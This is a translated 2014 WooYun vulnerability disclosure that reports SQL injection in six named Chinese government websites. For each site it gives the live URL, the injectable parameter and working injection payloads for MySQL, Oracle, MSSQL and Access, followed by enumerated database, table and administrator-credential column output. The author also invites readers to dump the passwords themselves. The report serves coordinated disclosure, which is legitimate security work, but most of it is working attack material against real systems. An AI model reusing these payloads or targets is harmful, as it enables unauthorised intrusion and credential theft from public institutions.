
Vulnerability summary

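Bug ID: wooyun-2014-073530

Title: SQL injection vulnerabilities in multiple government and public-institution websites

Vendor: CNCERT (National Internet Emergency Center)

Author: T0sk

Submitted: 2014-08-25 14:59

Fixed: 2014-11-23 15:00

Disclosed: 2014-11-23 15:00

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]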


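Vulnerability details

Disclosure status:

2014-08-25: Details reported to the vendor; awaiting vendor handling
2014-08-30: Vendor confirmed; details visible to the vendor only
2014-09-02: Details opened to third-party security partners
2014-10-24: Details opened to core white hats and experts in related fields
2014-11-03: Details opened to regular white hats
2014-11-13: Details opened to trainee white hats
2014-11-23: Details opened to the public

Brief description:

Detailed description:

1. Multiple SQL injections at a Tianjin human resources and social security bureau
Injection point: http://www.tjnklss.gov.cn/gonggao/gonggao_detail.asp?id=144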
Host IP: 60.29.182.52
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Keyword Found: 最佳浏览模式
Injection type is Integer
DB Server: MSAccess
Table found: users
Table found: news
Table found: file
Total tables found: 3
Column found: id
Column found: username
Column found: password
Column found: now
Column found: userid
Total tables found: 5
Column found: id
Column found: now
Column found: content
Column found: title
Total tables found: 4
Column found: id
Column found: now
Column found: content
Column found: title
Total tables found: 4
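No need for me to dump the usernames and passwords, right? You young folks can carry on from here!

Proof of vulnerability:

2. SQL injection at a Hebei supervision and administration bureau
Injection point: http://www.hebfda.gov.cn/message/messageManager/messagedetail.jsp?ids=1814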
Place: GET
Parameter: ids
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ids=1814 AND 2390=2390
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ids=1814 AND 3541=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(85)||CHR(118)||CHR(74),5)
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HISIWEB300
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
current schema (equivalent to database on Oracle): 'HISIWEB300'
current user: 'HISIWEB300'
Database: HISIWEB300
[82 tables]
3. Multiple SQL injections on the site of an Anhui geological technology institute
Injection: http://www.ahdzch.gov.cn/news_show.php?art_id=1831
Host IP: 61.191.27.117
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: sq_ahdzch
Tables found:
Columns found:

id
username
userpswd
usertype
realname
date
4. SQL injection at a Zhejiang municipal administration for industry and commerce, which can lead to data leakage
Injection: http://www.12315.gov.cn/dzgg/dzgg_detail.php?nbxh=3302140000035998
Place: GET
Parameter: nbxh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nbxh=3302140000035998 AND 9524=9524
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: nbxh=3302140000035998 AND (SELECT 4745 FROM(SELECT COUNT(*),CONCAT(0x3a6d66613a,(SELECT (CASE WHEN (4745=4745) THEN 1 ELSE 0 END)),0x3a736f703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: nbxh=3302140000035998 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6d66613a,0x555a7352576947615977,0x3a736f703a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: nbxh=3302140000035998 AND SLEEP(5)
available databases [2]:
[*] gs
[*] information_schema
current database: 'gs'
current user: 'gs@localhost'
Database: gs
[155 tables]
Database: gs
Table: 12315_admin
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| ip | char(80) |
| lstdate | datetime |
| name | char(20) |
| password | char(20) |
| username | char(20) |
+----------+----------+
Database: gs
Table: 12315_admin
[7 entries]
Database: gs
Table: 12315_admin
[7 entries]
5. SQL injection at a Hubei municipal planning bureau
Injection: http://www.hbhggh.gov.cn/search.aspx?keywords=
Place: GET
Parameter: keywords
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: keywords=%' AND 6413=CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR(97)+CHAR(119)+CHAR(58)+(SELECT (CASE WHEN (6413=6413) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(122)+CHAR(120)+CHAR(99)+CHAR(58))) AND '%'='
available databases [5]:
[*] huanggang_news
[*] master
[*] model
[*] msdb
[*] tempdb
current database: 'huanggang_news'
current user: 'huanggang_news'
Database: huanggang_news
[40 tables]
Database: huanggang_news
Table: dbo.lh_manager
[10 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| add_time | datetime |
| email | nvarchar |
| id | int |
| is_lock | int |
| real_name | nvarchar |
| role_id | int |
| role_type | int |
| telephone | nvarchar |
| user_name | nvarchar |
| user_pwd | nvarchar |
+-----------+----------+
Database: huanggang_news
Table: dbo.lh_manager
[2 entries]
Database: huanggang_news
Table: dbo.lh_manager
[21 entries]
6. SQL injection on a government information disclosure site in Datong, Shanxi; data leakage
Injection: http://www.sxdt.gov.cn:8080/contents.php?id=7909
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=7909' AND 1390=CONVERT(INT,(CHAR(58)+CHAR(100)+CHAR(106)+CHAR(107)+CHAR(58)+(SELECT (CASE WHEN (1390=1390) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(104)+CHAR(117)+CHAR(112)+CHAR(58))) AND 'vLmF'='vLmF
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=7909' UNION ALL SELECT NULL, CHAR(58)+CHAR(100)+CHAR(106)+CHAR(107)+CHAR(58)+CHAR(102)+CHAR(114)+CHAR(71)+CHAR(102)+CHAR(69)+CHAR(67)+CHAR(81)+CHAR(65)+CHAR(68)+CHAR(104)+CHAR(58)+CHAR(104)+CHAR(117)+CHAR(112)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=7909'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=7909' WAITFOR DELAY '0:0:5'--
available databases [6]:
[*] DTSitefactory
[*] DTSiteWeaver
[*] master
[*] model
[*] msdb
[*] tempdb
current database: 'DTSitefactory'
current user: 'NT AUTHORITY\\SYSTEM'
Database: DTSitefactory
[178 tables]
Database: DTSitefactory
Table: dbo.PE_Admin
[15 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| AdminID | int |
| AdminName | nvarchar |
| AdminPassword | nvarchar |
| EnableModifyPassword | bit |
| EnableMultiLogin | bit |
| Hash | nvarchar |
| IsLock | bit |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LastLogoutTime | datetime |
| LastModifyPasswordTime | datetime |
| LoginErrorTimes | int |
| LoginTimes | int |
| RndPassword | nvarchar |
| UserName | nvarchar |
+------------------------+----------+
Database: DTSitefactory
Table: dbo.PE_Admin
[105 entries]
Database: DTSitefactory
Table: dbo.PE_Admin
[39 entries]

Remediation:

Filtering

Copyright notice: please credit the source when reposting: T0sk@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-08-30 10:27

Vendor reply:

Latest status:

None yet

